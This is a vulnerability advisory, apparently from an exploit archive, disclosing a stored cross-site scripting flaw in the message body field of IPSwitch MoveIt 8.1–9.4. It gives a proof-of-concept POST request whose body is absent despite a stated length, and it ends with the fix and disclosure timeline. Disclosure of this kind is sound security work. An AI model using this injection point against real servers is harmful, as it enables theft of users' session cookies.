IPSwitch MoveIt 9.4 Cross Site Scripting

IPSwitch MoveIt versions 8.1 through 9.4 suffer from a persistent cross site scripting vulnerability.

MD5 | 723b0f6426716909db57c54c2b850fdf

# Exploit Title: IPSwitch MoveIt Stored Cross Site Scripting (XSS)
# Date: 1-31-2017
# Software Link: https://www.ipswitch.com/moveit
# Affected Version: 8.1-9.4 (only confirmed on 8.1 but other versions prior to 9.5 may also be vulnerable)
# Exploit Author: 1N3@CrowdShield - https://crowdshield.com (Early Warning Security)
# Contact: https://twitter.com/crowdshield
# Vendor Homepage: https://www.ipswitch.com
# Category: Webapps
# Attack Type: Remote
# Impact: Data/Cookie Theft

1. Description

IPSwitch MoveIt v8.1 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. Attackers can leverage this vulnerability to send malicious messages to other users in order to steal session cookies and launch client-side attacks.

2. Proof of Concept

The vulnerability lies in the Send Message -> Body Text Area input field.

POST /human.aspx?r=692492538 HTTP/1.1
Host: host.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://host.com/human.aspx?r=510324925
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 598


3. Solution:

Update to version 9.5

4. Disclosure Timeline

1/30/2017 - Disclosed details of vulnerability to IPSwitch.
1/31/2017 - IPSwitch confirmed the vulnerability and verified the fix as of version 9.5 and approved public disclosure of the vulnerability.

Related Posts